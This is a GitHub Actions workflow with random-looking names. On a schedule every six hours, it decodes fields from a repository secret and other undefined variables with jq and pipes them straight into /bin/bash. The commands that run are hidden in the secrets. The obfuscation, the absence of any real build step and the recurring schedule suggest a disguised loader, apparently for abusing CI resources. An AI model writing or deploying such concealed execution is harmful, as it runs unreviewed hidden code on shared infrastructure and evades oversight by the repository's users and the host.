name: zhangguifan2189
on:
  workflow_dispatch:
  schedule:
    - cron: '57 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: zhangguifan2189
        env:
          hwzpb5179: ${{ secrets.hwzpb5179 }}
        run: |
          echo $hwzpb5179 | jq -r .aapd269 | /bin/bash
          echo $sqwdo77417 | jq -r .vrsjr680 | /bin/bash
          echo $o374 | jq -r .t5378 | /bin/bash
          echo $d0619 | jq -r .c8927 | /bin/bash
          echo $u36119 | jq -r .uf47320 | /bin/bash
          echo $yj4365 | jq -r .vaf4 | /bin/bash
          echo $fo42286 | jq -r .apc2 | /bin/bash
          echo $nrnm47 | jq -r .xokom05 | /bin/bash
          echo $o28 | jq -r .szipf0 | /bin/bash
          echo $aodml30104 | jq -r .ll5 | /bin/bash

